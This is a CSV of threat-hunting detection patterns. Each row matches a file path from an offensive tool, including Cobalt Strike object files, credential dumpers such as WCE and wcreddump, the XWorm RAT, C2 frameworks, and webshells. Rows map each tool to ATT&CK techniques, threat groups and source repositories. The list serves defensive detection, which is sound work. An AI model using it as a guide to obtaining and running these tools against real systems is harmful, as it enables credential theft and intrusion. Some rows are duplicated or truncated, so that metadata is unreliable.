"*/Volumiser-maser.zip*",".{0,1000}\/Volumiser\-maser\.zip.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","12480"
"*/vpc__enum_lateral_movement*",".{0,1000}\/vpc__enum_lateral_movement.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","12481"
"*/vss-enum.py*",".{0,1000}\/vss\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12484"
"*/vssenum/*",".{0,1000}\/vssenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","12485"
"*/vtam-enum.nse*",".{0,1000}\/vtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12487"
"*/vulners.nse*",".{0,1000}\/vulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12488"
"*/vulnscan.yaml*",".{0,1000}\/vulnscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","12489"
"*/vulnserver.py*",".{0,1000}\/vulnserver\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","12490"
"*/vulscan.nse*",".{0,1000}\/vulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","12491"
"*/vuze-dht-info.nse*",".{0,1000}\/vuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12492"
"*/waf__enum/main.py*",".{0,1000}\/waf__enum\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","12493"
"*/Wait_For_Command.ps1*",".{0,1000}\/Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","12494"
"*/Waitfor-Persistence.git*",".{0,1000}\/Waitfor\-Persistence\.git.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","12495"
"*/Waitfor-Persistence.ps1*",".{0,1000}\/Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","12496"
"*/wapitiCore/*",".{0,1000}\/wapitiCore\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","12497"
"*/wapiti-scanner/*",".{0,1000}\/wapiti\-scanner\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","12498"
"*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12500"
"*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12501"
"*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12502"
"*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12503"
"*/wce.exe*",".{0,1000}\/wce\.exe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","12504"
"*/wce32.exe*",".{0,1000}\/wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","12505"
"*/wce64.exe*",".{0,1000}\/wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","12506"
"*/wce-beta.zip*",".{0,1000}\/wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick  - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","N/A","8","4","N/A","N/A","N/A","N/A","12507"
"*/wcreddump.git*",".{0,1000}\/wcreddump\.git.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","12508"
"*/wcreddump.py*",".{0,1000}\/wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","12509"
"*/wdb-version.nse*",".{0,1000}\/wdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12510"
"*/WDExclusion.dll*",".{0,1000}\/WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12511"
"*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12512"
"*/wdextract.cpp*",".{0,1000}\/wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12513"
"*/WDExtract.git*",".{0,1000}\/WDExtract\.git.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12514"
"*/wdextract32.exe*",".{0,1000}\/wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12515"
"*/wdextract64.exe*",".{0,1000}\/wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","12516"
"*/wdigest.py*",".{0,1000}\/wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12517"
"*/WdToggle.c*",".{0,1000}\/WdToggle\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","12518"
"*/WdToggle.h*",".{0,1000}\/WdToggle\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","12519"
"*/weakpass.git*",".{0,1000}\/weakpass\.git.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","12520"
"*/weakpass_2a.gz*",".{0,1000}\/weakpass_2a\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","12521"
"*/weakpass_3a.7z*",".{0,1000}\/weakpass_3a\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","12522"
"*/Web/decouverte.txt*",".{0,1000}\/Web\/decouverte\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12523"
"*/Web/discovery.txt*",".{0,1000}\/Web\/discovery\.txt.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12524"
"*/web/pwn.html*",".{0,1000}\/web\/pwn\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","12525"
"*/web_browser_password.html*",".{0,1000}\/web_browser_password\.html.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12526"
"*/web_delivery.py*",".{0,1000}\/web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12527"
"*/web_rce.py*",".{0,1000}\/web_rce\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","12528"
"*/webauthn-inject.js*",".{0,1000}\/webauthn\-inject\.js.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","12529"
"*/WebC2.cs*",".{0,1000}\/WebC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","#linux","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","12530"
"*/webdav.py*",".{0,1000}\/webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12531"
"*/WebDavC2.git*",".{0,1000}\/WebDavC2\.git.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","12532"
"*/webdavshare/potato.local*",".{0,1000}\/webdavshare\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","12533"
"*/web-hacking-toolkit*",".{0,1000}\/web\-hacking\-toolkit.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1210 - T1059 - T1105 - T1189 - T1071","TA0001 - TA0002 - TA0011 - TA0005","N/A","N/A","Exploitation tool","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","N/A","","N/A","","","","12534"
"*/weblistener.py*",".{0,1000}\/weblistener\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","12536"
